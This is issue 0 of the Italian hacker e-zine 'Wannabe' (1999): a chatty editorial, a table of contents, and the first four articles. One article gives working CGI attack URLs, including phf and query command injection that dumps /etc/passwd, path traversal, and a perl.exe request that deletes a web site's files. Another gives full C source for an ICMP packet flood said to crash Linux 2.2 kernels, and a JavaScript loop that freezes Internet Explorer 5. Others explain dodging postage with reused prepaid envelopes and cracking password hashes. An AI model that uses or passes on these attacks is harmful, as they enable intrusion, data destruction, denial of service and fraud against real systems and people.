Copy Link
Add to Bookmark
Report

Wannabe 00

eZine's profile picture
Published in 
Wannabe
 · 5 years ago

  




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+/\ \ __/\ \ /\ \ BoBo & LaNdo +
+\ \ \/\ \ \ \ __ ___ ___ __ \ \ \____ __ +
+ \ \ \ \ \ \ \ /'__`\ /' _ `\ /' _ `\ /'__`\ \ \ '__`\ /'__`\ +
+ \ \ \_/ \_\ \/\ \ \.\_/\ \/\ \/\ \/\ \/\ \ \.\_\ \ \ \ \/\ __/ +
+ \ `\___x___/\ \__/.\_\ \_\ \_\ \_\ \_\ \__/.\_\\ \_,__/\ \____\+
+ '\/__//__/ \/__/\/_/\/_/\/_/\/_/\/_/\/__/\/_/ \/___/ \/____/+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Numero 0 - 1 ottobre 1999




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-Responsabilità: +
+Usa queste informazioni a tuo rischio e pericolo. Noi dell'e-zine Wannabe, -
-l'Attila_Hack Crew e qualsiasi altra persona ci abbia aiutato a scrivere +
+questa e-zine non si assumerà nessuna responsabilità per l'uso scorretto -
-questa rivista. +
+Le seguenti informazioni sono state scritte solamente per scopo educativo e -
-informativo e non devono essere usate per scopi illegali, ma solo per +
+difendersi da persone che usano queste informazioni in maniera sovversiva. -
- Attila_Hack Crew e Wannabe_1999 Staff +
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



Editoriale e saluti: (non tanto brevi:)) Ehehehe 26/settembre/1999
a cura di BoBo with collaboration Zio Marzo

Salve ragazzi/e questa nostra e-zines è nata il 20 giugno di questo anno quando
per caso io e Zio Marzo ci siamo incontrati su irc e chattando un po siamo arrivati
alla conclusione che la scena underground hacker/cracker/phreaker poteva aver bisogno
di un'altra e-zine.
Ma perchè ancora una e-zine? Non ce ne sono già un casino in giro? Bhè in effetti di
e-zine la scena underground italiana ne è piena, a partire dalla stupenda e inimitabile
BFI con cui colgo l'occasione per salutare \sPIRIT\, per poi passare a Newbies (Nobody
e ZeroCool stanno facendo un ottimo lavoro), infine, come non nominare Netrunners e
RigorMortis (no, ehehehehe Rigor_Mortem:), ti ricordi?), per la cronaca è giusto citare
anche le ultime tre e-zine nate, una di Tormento, una di BoBByMetal "Hjacker" e un'altra
"Anarchy in the system" di Oldiron61 che spero possano proseguire e diventare famose come
Netrunners-BFI e Newbies.
Allora... ragazzi, questa e-zine è nata perchè anche l'Attila_Hack Crew voleva
contribuire con una propria rivista dedicata all'h/c/p/v nella scena Italiana e volevamo
rendere disponibili i molti articoli che arrivavano all'indirizzo e-mail di Attila_Hack,
quindi abbiamo cercato di unire l'utile al dilettevole :) formando una e-zine
che raccogliesse oltre agli articoli, le opinioni, le richieste e le critiche del suo
pubblico.
Allora... vorrei salutare: \\Ken e Julie-tte due miei amici di #kenshiro e #valvolin3
(hei ken se non ci fossi tu come farebbero quelli della Valvoline Crew:))
P.S. siete

<Homer mode on>

Stramiticuzzi :)Dheheheiiihhihiuhuhuhu

<Homer mode off>

Poi vorrei salutare TUTTA la Valvoline Crew (il vostro sito è semplicemente stupendo:)) e in
particolare valv0 che mi ha dato subito la sua disponibilità per "costruire" una e-zine
decente (hei valv0 sei simpaticissimo ;-))
Poi un saluto particolare va a Quequero, una persona disponibile a risolvere ogni mio piccolo
dubbio, oltre ad essere un cracker eccellente (boooni quelli della pavesi :)) è un mio grande
amico e non per niente è un Attila_Hack MemberZ :). Hei ancora non conoscete l'Università
Italiana Crackers? AARRRGGGGHHHHHHH Oddio ecchè c'e state affà ar mondo, il fantastico
progetto U.I.C. del grande Quequero è diventato ora realtà, correte immediatamente ad
iscrivervi, il sito di Quequero lo trovate nella sezione links del sito di Attila_Hack o
alla fine di questa e-zine.

Un grazie particolare va a b0nu$ anche lui Attila_Hack MemberZ, una persona mezzo uomo e
mezzo Tasm :) (vero Que?).
Poi ringrazio anche tutti gli altri Attila_Hack MemberZ che sono: Reset, Ritz, Away,
Xio Buttha (il cuggino di Buttha Spp Member) (da notare che le due g sono volontarie
eheheh, vero Buttha? ;)), Kernel 2.3.3, IlCraccatore, TorpedoBlu e The Pac-Man per la
loro collaborazione e per il supporto morale e pratico che mi hanno dato, Scully per
le traduzioni che fa, Freak e Chewie (allora..il progetto pulce che fine ha fatto?).

I mieiei migliori saluti li mando a tutti gli Spp e in particolare a Buttha,
che è il Budda del newsgroup alt.hackers.cough.cough.cough, a Fritz per il malinteso
che era sorto non molto tempo fa (beh spero che adesso diventeremo amici no?:)), e non posso
non rinominare Rigor_MorteM (uè, ma non mi dovevi mandare un articolo per l'e-zine, almeno
fatti sentire no? :))
Altri ringraziamenti vari vanno a tutti i RingZer0 e a quelli di #crack-it, in particolare
a Furb3t (che non risponde quasi mai alle mie mail :(), Neureal_en, sPEzio, Black Druid, e
rinomino volentieri Away e Ritz che hanno scritto un bel po di articoli in pochi giorni
(uau siete proprio dei bravi ragazzi :)), a Kalidor che doveva scrivere qualcosa per noi,
ma non si è fatto più sentire, a Oldiron61 (uè Oldiron mi dispiace, ma i tuoi articoli non
li possiamo mettere...motivo? Alcuni di noi non sono d'accordo nel trattare l'argomento
Anarchy comunque complimenti per la tua e-zine che è davvero simpatica), a Lord Guf per le
sue critiche costruttive :), al root di dislessici.org (mi raccomando continuate così :)),
a Cavallo de Cavallis che quando gli ho chiesto se voleva scrivere qualcosa per noi mi ha
risposto come risponde Homer e io non ho capito se era un si o un no :), a Mr_Skull, a LiQUID,
a BugByte, a S2, ad Avatar,a CDP, a tutto lo Spaghetti Phreaker Team e poi....bho non mi
ricordo più :) se mi sono dimenticato qualcuno segnalatemelo e provvederò all'uscita
della prossima e-zine.
Ah..due ringraziamenti particolarissimi vanno a Zio Marzo (questa e-zine è un idea anche sua :))
e a LaNdo che sarebbe il MAESTRO, il GURU di Linux e *nix, un mago della programmazione
e il pistolero solitario delle reti, piu famoso con il nick: il server Vivente... Hehehe:).

Mi sono giunte voci che dicevano che Hack Nirvana era un Attila_Hack MemberZ.
QUESTO NON E' ASSOLUTAMENTE VERO. Adesso vorrei chiudere questa parentesi e non aprire
+ discussioni su "Hack Nirvana Lamer o Hacker?", a questo ci penseranno gli Spp che a quanto
ho sentito sono stati attaccati direttamente da H_N.

Beh con questo spero di aver finito vi voglio anche ricordare che per la realizzazione di
questa e-zine non è stata maltrattata nessuna bestia dello Zoo "Il Timone". Hei Valvoline
il tuo sito Fuck su quelli del timone mi ha fatto morire dal ridere Hahahaha, se non ci fossi
tu? Ti inventerei io ;)

Ultima cosa e poi vi lascio in pace davvero :), allora... vi volevo solo dire che se non siete
soddisfatti dell'e-zine e avete qualche idea per migliorarla segnalatelo a
attila_hack@hotmail.com e a wannabe_1999@hotmail.com, tutte le vostre critiche, obiezioni e
tutti gli articoli che manderete saranno presi in considerazione e se saranno ritenuti/e
validi/e saranno pubblicati/e.

Per concludere (che???!?!??! ma ancora non te sei rotto de scrive sta cavolo de intro?)
si vabbè allora vi volevo finire di dire :) che tutti gli errori di itagliano e di inglese
sono copirait dell Wannabe Staff 1999:))).

Godetevi l'e-zine BoBo e Zio Marzo Attila_Hack MemberZ

(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it

<======================================CUT HERE=======================================>
*------ ARTICOLI -------------------------&----------------------------- AUTORI ------*
<=====================================================================================>
#-[Manifesto degli Attila_Hack MemberZ e del Wannabe Staff]---------------------------#
#-[Sezione Hacking]-------------------------------------------------------------------#
#---[Cgi che passione!!!]--------------------------------------------+Mr_Skull+-------#
#---[Come Hackerare il servizio postale!]----------------------------+BoBo+-----------#
#---[Piccoli bug CRESCONO!]------------------------------------------+LaNdo+----------#
#---[E adesso che ho il file delle pwd?]-----------------------------+Zio Marzo+------#
#---[Come essere anonimi nel web, su irc e con l'invio di mail]------+Away+-----------#
#---[Come Hackerare i siti porno! E anche guida ai server Proxy]-----+LiQUID+---------#
#-[Sezione Cracking]------------------------------------------------------------------#
#---[First Crack]----------------------------------------------------+Away+-----------#
#---[Come craccare: "Ma quanto mi costi 3.0"]------------------------+Ritz+-----------#
#---[Come craccare PGP 5.5.5 ]---------------------------------------+Ritz+-----------#
#---[Manuale di cracking Prima parte]--------------------------------+S2+-------------#
#-[Sezione Programming]---------------------------------------------------------------#
#---[Impariamo l'Assembler-Prima parte-Intro, sist. di num. ed elem. di logica]+b0nu$+#
#-[Sezione Linux]---------------------------------------------------------------------#
#---[Installare Linux]-----------------------------------------------+LiQUID+---------#
#---[Ricompilare il Kernel]------------------------------------------+LaNdo+----------#
#---[Routing & Masquerading in Linux]--------------------------------+LaNdo+----------#
#-[Sezione Phreaking]-----------------------------------------------------------------#
#---[D'amore, di Phreaking e di altre sciocchezze]-------------------+The Pac-Man+----#
#---[Come crittare le telefonate e pagare un'urbana invece che un'interurbana]+BugByte#
#-[Sezione Lamah]---------------------------------------------------------------------#
#---[Come valangare di ping un ip con la legge dalla nostra parte]---+Mr.Lamah+-------#
#---[Interagire con telnet e BO]-------------------------------------+Mr.Lamah+-------#
#-[Sezione Viriing]-------------------------------------------------------------------#
#---[Virus che passione!!!]------------------------------------------+Ritz & Quequero+#
#-[Info varie]------------------------------------------------------------------------#
#---[Cosa sono e come si usano gli anonymous remailer]---------------+Quequero+-------#
#---[Come creare un Newsgroup!]--------------------------------------+BoBo+-----------#
#---[Come mantenere un sito Warez]-----------------------------------+LiQUID+---------#
#---[Due metodi per diventare OP con una botta di culo!!!]-----------+ZioButtha+------#
#---[Mandare SMS GRATISSS!!!(sia da internet sia dal cellulare)]+Spaghetti Team & BoBo#
#---[Come mandare SMS ANONIMIIIII!!!!]-------------------------------+The Crazy+------#
#-[Riflessioni del Wannabe staff]-----------------------------------------------------#
#---[Un blocco di testo inutile]-------------------------------------+S2+-------------#
#---[Per non dimenticare (Atomic)]-----------------------------------+Away+-----------#
#-[LinkZ a siti hacker, cracker e reverser]--------------------------+Reset+----------#
#-[Intervista all'Hacker di Jobs.com]--------------------------------+Reset+----------#
<======================================CUT HERE=======================================>



Manifesto degli Attila_Hack MemberZ e del Wannabe Staff:

Gli Attila_Hack MemberZ e il Wannabe Staff sono un gruppo di persone che si è unito per
allargare le proprie conoscenze nei campi Hacker, Cracker, Reverser e Phreaker.
Il loro scopo è quello di aiutarsi a vicenda anche nei campi della programmazione e
nell'utilizzo di sistemi operativi!! Non DEVE essere dimenticato che ogni membro
è una singola persona, quindi, risponde e risponderà per le sue azioni come singolo,
senza incolpare altri Membri per aver attuato quello che era scritto in un articolo o
per aver utilizzato un informazione per scopi illegali. Gli Attila_Hack MemberZ e
il Wannabe Staff si sono formati per scopo informativo e culturale, quindi in un
paese come l'Italia in cui regna la libertà d'informazione veniamo considerati dallo
stato come un gruppo di persone che studia soltanto e non applica MAI le tecniche
discusse e scritte dai membri.

Attila_Hack Crew e Wannabe_1999 Staff

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


_______ _______ ______ _____ _____ __ _ _______
|______ |______ ____/ | | | | \ | |__BoBo & LaNdo
______| |______ /_____ __|__ |_____| | \_| |______

_ _ _______ _______ _ _ _____ __ _ ______
|_____| |_____| | |____/ | | \ | | ____
| | | | |_____ | \_ __|__ | \_| |_____|







CGI CHE PASSIONE: by Mr_Skull



------------<[ /cgi-bin/ ]>------------------------------------------------------------

Autore: Mr_Skull

Consumo: 1 bicchiere d'acqua (bicchiere da 1 litro)

Musica ascoltata: Korn: Freak at a leash; The Immortals: Mortal Kombat Theme;
Marilyn Manson: I don't like the drugs [but the drugs like me], Sweet
dreams (are made of this)

Saluti: a mR_bIs0n, al NewBies Staff, a ZioMarzo, al bfi staff, e a tutti gli
"smanettoni", nonch‚ ad Andrea Monti

Fuck a: tutti quelli che dicono di dire la verita dicendo di non dire mai la
verit...

Barzelletta: L'uomo con il volto da eterno fanciullo...-TG3 (era riferito
a Bill Gate$)

------------------------Indice:

0) Disclaima
1) Cgi?
2) Il FAMOSISSIMO phf
3) Il FAMOSISSIMO perl
4) Il FAMOS... no, altri cgi
5) Cgi scanners
6) Conclusione

------------------------0) Disclaima

NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE NE FARETE DI QUESTE
INFORMAZIONI. SE SIETE UN WANNABE O NEWBIES O CHE DIR SI VOGLIA NON
DANNEGGIATE I SISTEMI. SE SIETE UN ROOT PERFAVORE NON PROTEGGETE I VOSTRI
SISTEMI :)

Una sera su irc viene ZioMarzo e mi dice:
<ZioMarzo>: ciao Mr, ti andrebbe di scrivere per una nuova e-zine?
(beh, veramente il dialogo era pi- luuuuungo, ma comunque...)
Naturalmente ho accettato, e cos eccomi qua a scrivere per Wannabe.

Da notare che io scrivo sia per Wannabe che per NewBies...

Dopo aver concordato sulla parcell... ehm, dopo una discussione, gli ho detto
vabb‚, scriver• qualcosa sul cgi...
Ed eccomi qua!

------------------------1) Cgi?

Cgi se non mi sbaglio (sbaglio) sta per Common Gateway Interface. Che vuol
dire? Aspe' che prendo il vocab... eh, vabb‚... non avete mai notato in un
sito web un link che vi dirotta su
www.sitochestatevisitando.com/cgi-bin/pinko.cgi?CICCIO%20+%20BEVE
?
Ecco, pinko.cgi Š un cgi! (intuizione degna di nota...). Un cgi Š un programma
scritto in c, perl, o che dir si voglia che pu• essere eseguito dal server
web. Nella cartella /cgi-bin ci sono tutti i cgi di un server.
E a noi che ce ne frega? Direte voi. Beh, se io vi dicessi che molti di kuesti
cgi sono exploitabili e che se alcuni girano come root potrete addirittura
eseguire dei comandi e vedere i risultati sul vostro browser di fiducia?
(LYNX FOR EVER!)
Qualche volta avrete sentito nominare

------------------------2) Il FAMOSISSIMO phf

Il phf Š il mio cgi preferito! Permette di eseguire tutti i komandi concessi
al web server, reindirizzando l'output sullo strumento che avete usato per
fare quel comando, anke sul BrOwSeR! E immaginate se il Web Server gira come
root ;). Se trovate un server vulnerabile a questo attacco, provate a digitare
questo:

www.servervulnerabileallattacco.gov/cgi-bin/phf?Qalias=x%0a/usr/bin/id

Se vi da come risultato uid = 0 e gid = 0, SIETE ROOT!
Ma aspettate, ultimamente mooooolti root difficilmente vi faranno entrare
nel cgi-bin... Comunque, quando ne trovate uno (come primo server tutto Š
lecito, anche www.sodomizing-systers.org(asmo)... ma non perdiamo il discorso.
Se vi pizzicasse la voglia di qualcosa di buono, prendete un ferrero rocher
(ok, la pianto con le scemenze).
Se al posto del comando id ci voleste mettere un bel cat /etc/passwd?
Semplice...

www.host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

ove %20 Š il codice ascii della barra spaziale. Se inoltre avete uid=gid=0
potrete eseguire *tutti* i comandi che potrebbe eseguire un root (okkio,
anche i web server loggano per•...).

Da notare: non omettete MAI il parametro Qalias=x%0a senn• non vi funziona
un kakka... Ma penso che l'avrete capito...

Bene, il phf Š disponibile solo su sistemi Unix e soci, ma se volessimo
bucare un server NT?
Eheheeh, Microsoft naturalmente fa solo prodotti che soddisfano gli utenti
(noi wannabe e gli hackers seri).
Allora, in assenza del piaccaeffe si usa

------------------------3) Il FAMOSISSIMO perl

Se avete trovato un web server lamer che gira su NT (non vi preoccupate, gi...
il fatto che girano su nt...), potrete provare ad utilizzare l'eseguibile
perl.exe che si trova nella cartella (indovinate un po') /cgi-bin

L'utilizzo di codesto eseguibile non si discosta molto dal phf... vi permette
di eseguire i comandi in linguaggio perl (grande intuizione)
Ad es.
Volete che il vostro amato perl elimini il sito? Niente di pi- facile:

www.sitochestapermorire.com/cgi-bin/perl.exe?-e+unlink+%3C*%3E

gli farete cos eseguire il comando unlink <*> infatti il parametro -e
serve a dire al perl di eseguire il comando che scriveremo dopo, e %3C e %3E
per chi non lo avesse ancora capito sono i codici ASCII di "<" e ">" senza
gli apici...

Naturalmente danneggiare un web server non Š affatto considerato 313373 e
potreste avere gravi rimorsi, sapendo di averlo fatto. Quindi, studiatevi
il perl e vedete tutti gli altri comandi fattibili...

Ora che ho parlato di phf e perl, i due progs pi- famosi, non mi resta che

------------------------4) Il FAMOS... no, altri cgi

Bene bene, vediamo un po' altri cgi spesso trascurati...

php.cgi (da non confondere con phf :)):
vi permette di visualizzare qualsiasi file (sempre che il web server ne abbia
il permesso). Ad esempio:
www.telekozz.it/cgi-bin/php.cgi?/etc/passwd
e se non vi esce un bel Not Allowed, avrete le password (criptate)!!!

view-source:
anche con questo potrete vedere un file qualsiasi...
Esempio:
www.telekozz.it/cgi-bin/view-source?../../../../../etc/passwd
NOTA: Š necessario andare prima nella dir. "/", cosicch‚ bisogna fare prima
un bel po' di ../ tanti quante sono le directory per le quali passa il web
server...

htmlscript:
funziona in modo analogo al viewsource quindi vedi sopra

query:
Vi pu• far eseguire dei comandi:
www.telekozz.it/cgi-bin/query?%0a/bin/cat%20/etc/passwd
bella vero?

nph-test-cgi:
vi fa vedere i files di una directory prescelta:
www.telekozz.it/cgi-bin/nph-test-cgi?/etc/* ;contenuto della cartella /etc
www.telekozz.it/cgi-bin/nph-test-cgi?* ;contenuto della cartella /cgi-bin/

Bene, io avrei phinito, ma devo dire che ci sono PAREKKI altri cgi, pi- di
60!!!
Ma come fare a provarli tutti???
Semplice, con i

------------------------5) Cgi scanners

Questi sono dei semplici programmini che si connettono all'indirizzo prescelto
sulla porta web e iniziano a provare tutti i cgi per i quali sono stati
programmati :)
Per chi avesse intenzione di farsene uno proprio, tenete queste dritte:

* per prelevare un file dal web si usa il comando GET
* conviene anche prendere informazioni sul web server usato
* vedete cosa vi risponde e printate se Š affermativo o negativo, non la
risposta, altrimenti inkasinate tutto all'utente medio.

Per i pi- pigri cercate su astalavista.box.sk o su www.rootshell.com
Troverete di sikuro kualkosa per voi ;)

Anche questa volta sono arrivato alla

------------------------0) Conclusione

Spero di avervi dilettato con questo articolo. Senn•, mi spiegate come avete
fatto a leggervi 178 righe?
Vi prego inoltre di segnalarmi eventuali errori concettuali (sono solo un
newbie io). Se volete contattarmi lo potete fare su IRC dalle 8 alle 9
(in genere) e mi trovate su #hackernow con il mio nick (Mr_Skull).

Saluti e mi raccomando, non bucate sistemi se non sapete nascondere il vostro
passaggio.
Mr_Skull






-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


COME HACKERARE IL SERVIZIO POSTALE: by BoBo



Data: 10 luglio 1999

Cibo consumato: una scatola di mangime per gatti :) sono le 4 di notte e ho
un'aria felina :))

Musica ascoltata: The Cat Woman Theme, Occhi di gatto di bimbomix Compilation


Allora.... ragazzi e ragazze adesso parliamo dell'esame orale di maturità
che ho dato stamattina.....cosa??!?!?!??? Non ve ne frega niente.....vabbè,
parliamo di dove andrò in vacanza.... bhè???!!!! non vi importa niente neanche
di quello?
Hehehe parliamo di come fottere il servizio postale?
Hey? anche questo non vi interessa? Perchèèè? Ah..ho capito allora voi la posta
tradizionale non la usate più.... siete nati nell'era tecnologica e comunicate
solo tramite e-mail/irc/icq!!!!
Beh, ma pur di qualcosa vi devo parlare noo? Ci sarà qualcuno interessato su come
non pagare le lettere che invia da casa?
Hei tu che alzi la mano li in fondo: 6° banco a destra vicino alla finestra, vuoi
sapere come spedire lettere assolutamente gratis da casa? No?!? devi solo andare
in bagno? e io nun-te-ce mando....tiè mo fattela sotto e ascolta chettedice BoBo:).

allora...bando alle ciance, cominciamo:

Allora...questo metodo mi è venuto in mente non molto tempo fa, ed è strano
che sia venuto in mente proprio a me (maccheccavolo sto a dì)

Vabbè allora consiste nel riutilizzare le buste che vi arrivano a casuccia
dallo Stato, io, personalmente utilizzo le buste della Playstation, quelle
che arrivano con il catalogo dei giochi....insomma utilizzate le buste che
vi pare basta che al posto del francobollo ci sia scritto "Spedizione in abbonamento
postale Stampe non periodiche Autorizzazione Filiale di Milano-Roma-Napoli" (dipende
da dove abiti). Poi cambiate il destinatario con quello che vi pare et voilà
le jeux sont fait.
Se non l'avete ancora capito, voi spedendo quella busta a chi vi pare non
pagherete una lira, infatti, sarà recapitata al vostro amico GRATIS.
Nota Finale: Per questa tecnica state sicuri io l'ho già provato e funge al 100*100.
Sennò adesso vi scriverei dar gabbio :)

Approfitto per ringraziare ZioMarzo, LaNdo, Scully, tutti gli Attila_Hack MemberZ,
gli amici di #crack-it e poi tutti quelli che gia ho salutato all'inizio :)).


P.S. Tutti gli errori di Itagliano sono puramente casuali e dovuti a circostanze misteriose:))







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


PICCOLI BUG CRESCONO (!!!)


by LaNdo (from rootshell)

Bug Kernel 2.2.x


Eccovi un bel bug del nuovo kernel di Linux....eheheheheh buon divertimento !!!!


Esiste un bug per quanto riguarda il nuovo kernel 2.2.x di Linux (testato su 2.2.7 e 2.2.9),
questo bug manda in "kernel panic" quando si spediscono al pc col suddetto kernel un grande
numero di pacchetti ICMP particolari.
Penso che la causa di questo sia dovuta ad una combinazione tra la lunghezza degli header e
il cambio (random) di tipo, sottotipo e mittente dei pacchetti spediti.
Winzozz 9x e FreeBSD 3.0 non ne sono affetti.

Il codice sottostante (da usare sotto Linux) spedisce pacchetti random: modificando tipo,
sottotipo e mittente.

Questo codice potrebbe non "girare" sulla vostra distribuzione (questo non vuol dire che
non ne siete affetti...)

Il codice va compilato col compilatore del c++: g++ exploit.cpp -o exploit



----------------------------------------------------------------------------
copia e incolla
----------------------------------------------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>

struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;

int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}

void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}

----------------------------------------------------------------------------
copia e incolla
----------------------------------------------------------------------------




Internet Explorer 5 bloccato


Questo codice se fatto "leggere" da Internet Explorer 5 con Javascript attivato
lo fa bloccare:

Divertitevi pure......... potete anche apportare delle variazioni al codice
non è difficile:


---------------------------------------------------------------------------
copia e incolla
---------------------------------------------------------------------------

<HTML>
<BODY>
<SCRIPT>

var color = new Array;
color[1] = "black";
color[2] = "white";

for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}


</SCRIPT>
</BODY>
</HTML>

---------------------------------------------------------------------------
copia e incolla
---------------------------------------------------------------------------







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-






E ADESSO CHE HO IL FILE DELLE PASSWORD?: By ZioMarzo




-------->Vi avverto che questo articolo è solo per chi è già in possesso
del "famoso" file .<-------------
Credo che questa sia la domanda più ricorrente nella mente di un wannabe
quando riesce finalmente dopo tanti sforzi a reperire dalla grande rete un
file delle passwd , ho ragione vero ?
Ebbene in questo articolo cercherò di illuminarvi per evitare che in futuro
questo dubbio amletico continui ad assillarvi .
Una volta avuto il file è bene aprirlo ; basta un semplice editor di testo
( prima fatene una copia da qualche altra parte ) quando l'editor avrà aperto
il file , vi si presenterà uno spettacolo del genere :

root:9IDv/CqdFuqWo:0:0:Super User:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
fax:*:3:10:Fax:/var/spool/fax:/bin/sh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
demos::993:997:Demonstration User:/usr/demos:/bin/csh
OutOfBox::995:997:Out of Box Experience:/usr/people/tour:/bin/csh
guest:iu77KKmsN2:998:998:Guest Account:/usr/adm/guest:/bin/csh
nobody:*:60001:60001:Nobody:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
www:*:20:10:The Web Slinger:/web/www:/bin/csh
webadmin:ecKu77KmsNALs:0:0:Sysadmin web account:/:/bin/sh
testact::1000:10:Test Account:/:/bin/mail
ftp:*:60001:60001:FTP ACCOUNT:/ftp:/dev/null

Bene , arrivati a questo punto tutti si chiedono : " e adesso cosa me ne faccio ? "

Guardate bene il contenuto del file , quelli sono tutte le login e le passwd di tutti
gli utenti e di tutti i servizi ; voi vi starete a chiedere come fare a distinguerle;
ve lo spiego io :

root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh <------- questa è la 1° riga cioè
quella che riguarda il root o il sysadmin ( l'amministratore del sistema , quello che
sguazza nei vostri dati e fa i suoi porci comodi solo perché ha una passwd di m…a )


La riga che vedete sopore può essere vista anche così :

root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh

Login: Passwd Criptata: UserID: GroupID: RealName: Home Directory: Shell

Ora che avete la passwd criptata non dovete far altro che decriptarla ; per fare questo
lavoro che risulterebbe impossibile altrimenti sono stati creati più programmi ma tra
questi uno si distingue : John The Ripper .
I furboni che hanno inventato Unix/Linux hanno anche inventato un metodo di criptazione
( il DES ) che è chiamato One-way ; one -way significa che da una parola normale si può
risalire a quella criptata ma non il contrario .
Vi chiederete , ma se non è possibile decriptare le parole John The Ripper come fa ?
Ebbene , questo magnifico programmino contiene delle liste di parole ( vocabolari ) che
possono contenere parole di carattere tecnico , comune , ecc. oltre a contenere i dati
dell'utente scelto ( nome , login ecc. ) le quali vengono criptate di continuo e confrontate
con la passwd da trovare , finche non combacia ; ma questo è un'altra storia .
Adesso che avete la passwd , potete fare quello che ne volete ma state attenti !!!

Byz

ZioMarzo (section e.zine's )

(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
